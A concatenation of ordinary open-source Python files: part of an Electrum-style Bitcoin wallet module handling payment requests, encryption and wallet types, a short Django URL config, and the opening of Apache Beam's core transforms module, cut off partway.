tx.output_info = info
def sign_transaction(self, tx, password):
if self.is_watching_only():
return
self.add_input_info_to_all_inputs(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign. start with ready keystores.
for k in sorted(self.get_keystores(), key=lambda ks: ks.ready_to_sign(), reverse=True):
try:
if k.can_sign(tx):
k.sign_transaction(tx, password)
except UserCancelled:
continue
return tx
def get_unused_addresses(self):
# fixme: use slots from expired requests
domain = self.get_receiving_addresses()
return [addr for addr in domain if not self.history.get(addr)
and addr not in self.receive_requests.keys()]
def get_unused_address(self):
addrs = self.get_unused_addresses()
if addrs:
return addrs[0]
def get_receiving_address(self):
# always return an address
domain = self.get_receiving_addresses()
if not domain:
return
choice = domain[0]
for addr in domain:
if not self.history.get(addr):
if addr not in self.receive_requests.keys():
return addr
else:
choice = addr
return choice
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def get_payment_request(self, addr, config):
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
out['URI'] = 'bitcoin:' + addr + '?amount=' + format_satoshis(out.get('amount'))
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
try:
baseurl = baseurl.replace(*rewrite)
except BaseException as e:
self.print_stderr('Invalid config setting for "url_rewrite". err:', e)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration):
timestamp = int(time.time())
_id = bh2u(Hash(addr + "%d"%timestamp))[0:10]
r = {'time':timestamp, 'amount':amount, 'exp':expiration, 'address':addr, 'memo':message, 'id':_id}
return r
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)[0]
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = pr.pki_data
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
def add_payment_request(self, req, config):
addr = req['address']
if not bitcoin.is_address(addr):
raise Exception(_('Invalid Bitcoin address.'))
if not self.is_mine(addr):
raise Exception(_('Address not in wallet.'))
amount = req.get('amount')
message = req.get('memo')
self.receive_requests[addr] = req
self.storage.put('payment_requests', self.receive_requests)
self.set_label(addr, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
return req
def remove_payment_request(self, addr, config):
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr)
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.storage.put('payment_requests', self.receive_requests)
return True
def get_sorted_requests(self, config):
def f(addr):
try:
return self.get_address_index(addr)
except:
return
keys = map(lambda x: (f(x), x), self.receive_requests.keys())
sorted_keys = sorted(filter(lambda x: x[0] is not None, keys))
return [self.get_payment_request(x[1], config) for x in sorted_keys]
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def add_address(self, address):
if address not in self.history:
self.history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self):
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return STO_EV_XPUB_PW
else:
return STO_EV_USER_PW
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, encrypt_storage=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = STO_EV_PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def get_depending_transactions(self, tx_hash):
"""Returns all (grand-)children of tx_hash in this wallet."""
children = set()
# TODO rewrite this to use self.spent_outpoints
for other_hash, tx in self.transactions.items():
for input in (tx.inputs()):
if input["prevout_hash"] == tx_hash:
children.add(other_hash)
children |= self.get_depending_transactions(other_hash)
return children
def txin_value(self, txin):
txid = txin['prevout_hash']
prev_n = txin['prevout_n']
for address, d in self.txo.get(txid, {}).items():
for n, v, cb in d:
if n == prev_n:
return v
# may occur if wallet is not synchronized
return None
def price_at_timestamp(self, txid, price_func):
"""Returns fiat price of bitcoin at the time tx got confirmed."""
height, conf, timestamp = self.get_tx_height(txid)
return price_func(timestamp if timestamp else time.time())
def unrealized_gains(self, domain, price_func, ccy):
coins = self.get_utxos(domain)
now = time.time()
p = price_func(now)
ap = sum(self.coin_price(coin['prevout_hash'], price_func, ccy, self.txin_value(coin)) for coin in coins)
lp = sum([coin['value'] for coin in coins]) * p / Decimal(COIN)
return lp - ap
def average_price(self, txid, price_func, ccy):
""" Average acquisition price of the inputs of a transaction """
input_value = 0
total_price = 0
for addr, d in self.txi.get(txid, {}).items():
for ser, v in d:
input_value += v
total_price += self.coin_price(ser.split(':')[0], price_func, ccy, v)
return total_price / (input_value/Decimal(COIN))
def coin_price(self, txid, price_func, ccy, txin_value):
"""
Acquisition price of a coin.
This assumes that either all inputs are mine, or no input is mine.
"""
if txin_value is None:
return Decimal('NaN')
cache_key = "{}:{}:{}".format(str(txid), str(ccy), str(txin_value))
result = self.coin_price_cache.get(cache_key, None)
if result is not None:
return result
if self.txi.get(txid, {}) != {}:
result = self.average_price(txid, price_func, ccy) * txin_value/Decimal(COIN)
self.coin_price_cache[cache_key] = result
return result
else:
fiat_value = self.get_fiat_value(txid, ccy)
if fiat_value is not None:
return fiat_value
else:
p = self.price_at_timestamp(txid, price_func)
return p * txin_value/Decimal(COIN)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class Imported_Wallet(Simple_Wallet):
# wallet made of imported addresses
wallet_type = 'imported'
txin_type = 'address'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
def is_watching_only(self):
return self.keystore is None
def get_keystores(self):
return [self.keystore] if self.keystore else []
def can_import_privkey(self):
return bool(self.keystore)
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore') if self.storage.get('keystore') else None
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
self.addresses = self.storage.get('addresses', {})
# fixme: a reference to addresses is needed
if self.keystore:
self.keystore.addresses = self.addresses
def save_addresses(self):
self.storage.put('addresses', self.addresses)
def can_import_address(self):
return self.is_watching_only()
def can_delete_address(self):
return True
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address):
return False
def is_mine(self, address):
return address in self.addresses
def get_fingerprint(self):
return ''
def get_addresses(self, include_change=False):
return sorted(self.addresses.keys())
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def import_address(self, address):
if not bitcoin.is_address(address):
return ''
if address in self.addresses:
return ''
self.addresses[address] = {}
self.storage.put('addresses', self.addresses)
self.storage.write()
self.add_address(address)
return address
def delete_address(self, address):
if address not in self.addresses:
return
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self.history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self.history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
pubkey = self.get_public_key(address)
self.addresses.pop(address)
if pubkey:
# delete key iff no other address uses it (e.g. p2pkh and p2wpkh for same key)
for txin_type in bitcoin.SCRIPT_TYPES.keys():
try:
addr2 = bitcoin.pubkey_to_address(txin_type, pubkey)
except NotImplementedError:
pass
else:
if addr2 in self.addresses:
break
else:
self.keystore.delete_imported_key(pubkey)
self.save_keystore()
self.storage.put('addresses', self.addresses)
self.storage.write()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.addresses[address].get('pubkey')
def import_private_key(self, sec, pw, redeem_script=None):
try:
txin_type, pubkey = self.keystore.import_privkey(sec, pw)
except Exception:
neutered_privkey = str(sec)[:3] + '..' + str(sec)[-2:]
raise BitcoinException('Invalid private key: {}'.format(neutered_privkey))
if txin_type in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
if redeem_script is not None:
raise BitcoinException('Cannot use redeem script with script type {}'.format(txin_type))
addr = bitcoin.pubkey_to_address(txin_type, pubkey)
elif txin_type in ['p2sh', 'p2wsh', 'p2wsh-p2sh']:
if redeem_script is None:
raise BitcoinException('Redeem script required for script type {}'.format(txin_type))
addr = bitcoin.redeem_script_to_address(txin_type, redeem_script)
else:
raise NotImplementedError(txin_type)
self.addresses[addr] = {'type':txin_type, 'pubkey':pubkey, 'redeem_script':redeem_script}
self.save_keystore()
self.save_addresses()
self.storage.write()
self.add_address(addr)
return addr
def get_redeem_script(self, address):
d = self.addresses[address]
redeem_script = d['redeem_script']
return redeem_script
def get_txin_type(self, address):
return self.addresses[address].get('type', 'address')
def add_input_sig_info(self, txin, address):
if self.is_watching_only():
x_pubkey = 'fd' + address_to_script(address)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
return
if txin['type'] in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
pubkey = self.addresses[address]['pubkey']
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
else:
raise NotImplementedError('imported wallets for p2sh are not implemented')
def pubkeys_to_address(self, pubkey):
for addr, v in self.addresses.items():
if v.get('pubkey') == pubkey:
return addr
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
k = 0
for a in addresses[::-1]:
if self.history.get(a):break
k = k + 1
return k
def min_acceptable_gap(self):
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if self.history.get(a):
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def load_addresses(self):
super().load_addresses()
self._addr_to_addr_index = {} # key: address, value: (is_change, index)
for i, addr in enumerate(self.receiving_addresses):
self._addr_to_addr_index[addr] = (False, i)
for i, addr in enumerate(self.change_addresses):
self._addr_to_addr_index[addr] = (True, i)
def create_new_address(self, for_change=False):
assert type(for_change) is bool
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self._addr_to_addr_index[address] = (for_change, n)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if list(map(lambda a: self.address_is_old(a), addresses[-limit:] )) == limit*[False]:
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address):
is_change, i = self.get_address_index(address)
addr_list = self.get_change_addresses() if is_change else self.get_receiving_addresses()
limit = self.gap_limit_for_change if is_change else self.gap_limit
if i < limit:
return False
prev_addresses = addr_list[max(0, i - limit):max(0, i)]
for addr in prev_addresses:
if self.history.get(addr):
return False
return True
def is_mine(self, address):
return address in self._addr_to_addr_index
def get_address_index(self, address):
return self._addr_to_addr_index[address]
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def pubkeys_to_address(self, pubkeys):
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return transaction.multisig_script(sorted(pubkeys), self.m)
def get_redeem_script(self, address):
pubkeys = self.get_public_keys(address)
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return redeem_script
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return STO_EV_USER_PW
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
# pubkeys is set to None to signal that x_pubkeys are unsorted
derivation = self.get_address_index(address)
x_pubkeys_expected = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
x_pubkeys_actual = txin.get('x_pubkeys')
# if 'x_pubkeys' is already set correctly (ignoring order, as above), leave it.
# otherwise we might delete signatures
if x_pubkeys_actual and set(x_pubkeys_actual) == set(x_pubkeys_expected):
return
txin['x_pubkeys'] = x_pubkeys_expected
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported': Imported_Wallet
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
# former WalletFactory
class Wallet(object):
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise RuntimeError("Unknown wallet type: " + str(wallet_type))
|
py | b415a063d0e3771167fcfd4e3d7aba524f3c5b93 | from django.urls import path
from . import views
urlpatterns = [
path('<int:pk>', views.Inscribete.as_view(), name='inscribete')
]
|
py | b415a289bbbdf907a2d7c2e297e1a6cc5dffd0ea | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Core PTransform subclasses, such as FlatMap, GroupByKey, and Map."""
# pytype: skip-file
from __future__ import absolute_import
import copy
import inspect
import logging
import random
import types
import typing
from builtins import map
from builtins import object
from builtins import range
from past.builtins import unicode
from apache_beam import coders
from apache_beam import pvalue
from apache_beam import typehints
from apache_beam.coders import typecoders
from apache_beam.internal import pickler
from apache_beam.internal import util
from apache_beam.options.pipeline_options import TypeOptions
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.transforms import ptransform
from apache_beam.transforms import userstate
from apache_beam.transforms.display import DisplayDataItem
from apache_beam.transforms.display import HasDisplayData
from apache_beam.transforms.ptransform import PTransform
from apache_beam.transforms.ptransform import PTransformWithSideInputs
from apache_beam.transforms.sideinputs import get_sideinput_index
from apache_beam.transforms.userstate import StateSpec
from apache_beam.transforms.userstate import TimerSpec
from apache_beam.transforms.window import GlobalWindows
from apache_beam.transforms.window import TimestampCombiner
from apache_beam.transforms.window import TimestampedValue
from apache_beam.transforms.window import WindowedValue
from apache_beam.transforms.window import WindowFn
from apache_beam.typehints import trivial_inference
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import WithTypeHints
from apache_beam.typehints.decorators import get_signature
from apache_beam.typehints.decorators import get_type_hints
from apache_beam.typehints.decorators import with_input_types
from apache_beam.typehints.decorators import with_output_types
from apache_beam.typehints.trivial_inference import element_type
from apache_beam.typehints.typehints import is_consistent_with
from apache_beam.utils import urns
from apache_beam.utils.timestamp import Duration
if typing.TYPE_CHECKING:
from google.protobuf import message # pylint: disable=ungrouped-imports
from apache_beam.io import iobase
from apache_beam.pipeline import Pipeline
from apache_beam.runners.pipeline_context import PipelineContext
from apache_beam.transforms import create_source
from apache_beam.transforms.trigger import AccumulationMode
from apache_beam.transforms.trigger import DefaultTrigger
from apache_beam.transforms.trigger import TriggerFn
try:
import funcsigs # Python 2 only.
except ImportError:
funcsigs = None
__all__ = [
'DoFn',
'CombineFn',
'PartitionFn',
'ParDo',
'FlatMap',
'FlatMapTuple',
'Map',
'MapTuple',
'Filter',
'CombineGlobally',
'CombinePerKey',
'CombineValues',
'GroupByKey',
'Partition',
'Windowing',
'WindowInto',
'Flatten',
'Create',
'Impulse',
'RestrictionProvider',
'WatermarkEstimatorProvider',
]
# Type variables
T = typing.TypeVar('T')
K = typing.TypeVar('K')
V = typing.TypeVar('V')
_LOGGER = logging.getLogger(__name__)
class DoFnContext(object):
"""A context available to all methods of DoFn instance."""
pass
class DoFnProcessContext(DoFnContext):
"""A processing context passed to DoFn process() during execution.
Experimental; no backwards-compatibility guarantees.
Most importantly, a DoFn.process method will access context.element
to get the element it is supposed to process.
Attributes:
label: label of the ParDo whose element is being processed.
element: element being processed
(in process method only; always None in start_bundle and finish_bundle)
timestamp: timestamp of the element
(in process method only; always None in start_bundle and finish_bundle)
windows: windows of the element
(in process method only; always None in start_bundle and finish_bundle)
state: a DoFnState object, which holds the runner's internal state
for this element.
Not used by the pipeline code.
"""
def __init__(self, label, element=None, state=None):
"""Initialize a processing context object with an element and state.
The element represents one value from a PCollection that will be accessed
by a DoFn object during pipeline execution, and state is an arbitrary object
where counters and other pipeline state information can be passed in.
DoFnProcessContext objects are also used as inputs to PartitionFn instances.
Args:
label: label of the PCollection whose element is being processed.
element: element of a PCollection being processed using this context.
state: a DoFnState object with state to be passed in to the DoFn object.
"""
self.label = label
self.state = state
if element is not None:
self.set_element(element)
def set_element(self, windowed_value):
if windowed_value is None:
# Not currently processing an element.
if hasattr(self, 'element'):
del self.element
del self.timestamp
del self.windows
else:
self.element = windowed_value.value
self.timestamp = windowed_value.timestamp
self.windows = windowed_value.windows
class ProcessContinuation(object):
"""An object that may be produced as the last element of a process method
invocation.
Experimental; no backwards-compatibility guarantees.
If produced, indicates that there is more work to be done for the current
input element.
"""
def __init__(self, resume_delay=0):
"""Initializes a ProcessContinuation object.
Args:
resume_delay: indicates the minimum time, in seconds, that should elapse
before re-invoking process() method for resuming the invocation of the
current element.
"""
self.resume_delay = resume_delay
@staticmethod
def resume(resume_delay=0):
"""A convenient method that produces a ``ProcessContinuation``.
Args:
resume_delay: delay after which processing current element should be
resumed.
Returns: a ``ProcessContinuation`` for signalling the runner that current
input element has not been fully processed and should be resumed later.
"""
return ProcessContinuation(resume_delay=resume_delay)
class RestrictionProvider(object):
"""Provides methods for generating and manipulating restrictions.
This class should be implemented to support Splittable ``DoFn`` in Python
SDK. See https://s.apache.org/splittable-do-fn for more details about
Splittable ``DoFn``.
To denote a ``DoFn`` class to be Splittable ``DoFn``, ``DoFn.process()``
method of that class should have exactly one parameter whose default value is
an instance of ``RestrictionProvider``.
The provided ``RestrictionProvider`` instance must provide suitable overrides
for the following methods:
* create_tracker()
* initial_restriction()
Optionally, ``RestrictionProvider`` may override default implementations of
following methods:
* restriction_coder()
* restriction_size()
* split()
* split_and_size()
** Pausing and resuming processing of an element **
As the last element produced by the iterator returned by the
``DoFn.process()`` method, a Splittable ``DoFn`` may return an object of type
``ProcessContinuation``.
If provided, ``ProcessContinuation`` object specifies that runner should
later re-invoke ``DoFn.process()`` method to resume processing the current
element and the manner in which the re-invocation should be performed. A
``ProcessContinuation`` object must only be specified as the last element of
the iterator. If a ``ProcessContinuation`` object is not provided the runner
will assume that the current input element has been fully processed.
** Updating output watermark **
``DoFn.process()`` method of Splittable ``DoFn``s could contain a parameter
with default value ``DoFn.WatermarkReporterParam``. If specified this asks the
runner to provide a function that can be used to give the runner a
(best-effort) lower bound about the timestamps of future output associated
with the current element processed by the ``DoFn``. If the ``DoFn`` has
multiple outputs, the watermark applies to all of them. Provided function must
be invoked with a single parameter of type ``Timestamp`` or as an integer that
gives the watermark in number of seconds.
"""
def create_tracker(self, restriction):
# type: (...) -> iobase.RestrictionTracker
"""Produces a new ``RestrictionTracker`` for the given restriction.
This API is required to be implemented.
Args:
restriction: an object that defines a restriction as identified by a
Splittable ``DoFn`` that utilizes the current ``RestrictionProvider``.
For example, a tuple that gives a range of positions for a Splittable
``DoFn`` that reads files based on byte positions.
Returns: an object of type ``RestrictionTracker``.
"""
raise NotImplementedError
def initial_restriction(self, element):
"""Produces an initial restriction for the given element.
This API is required to be implemented.
"""
raise NotImplementedError
def split(self, element, restriction):
"""Splits the given element and restriction.
Returns an iterator of restrictions. The total set of elements produced by
reading input element for each of the returned restrictions should be the
same as the total set of elements produced by reading the input element for
the input restriction.
This API is optional if ``split_and_size`` has been implemented.
"""
yield restriction
def restriction_coder(self):
"""Returns a ``Coder`` for restrictions.
Returned``Coder`` will be used for the restrictions produced by the current
``RestrictionProvider``.
Returns:
an object of type ``Coder``.
"""
return coders.registry.get_coder(object)
def restriction_size(self, element, restriction):
"""Returns the size of an element with respect to the given element.
By default, asks a newly-created restriction tracker for the default size
of the restriction.
This API is required to be implemented.
"""
raise NotImplementedError
def split_and_size(self, element, restriction):
"""Like split, but also does sizing, returning (restriction, size) pairs.
This API is optional if ``split`` and ``restriction_size`` have been
implemented.
"""
for part in self.split(element, restriction):
yield part, self.restriction_size(element, part)
def get_function_arguments(obj, func):
# type: (...) -> typing.Tuple[typing.List[str], typing.List[typing.Any]]
"""Return the function arguments based on the name provided. If they have
a _inspect_function attached to the class then use that otherwise default
to the modified version of python inspect library.
Returns:
Same as get_function_args_defaults.
"""
func_name = '_inspect_%s' % func
if hasattr(obj, func_name):
f = getattr(obj, func_name)
return f()
f = getattr(obj, func)
return get_function_args_defaults(f)
def get_function_args_defaults(f):
# type: (...) -> typing.Tuple[typing.List[str], typing.List[typing.Any]]
"""Returns the function arguments of a given function.
Returns:
(args: List[str], defaults: List[Any]). The first list names the
arguments of the method and the second one has the values of the default
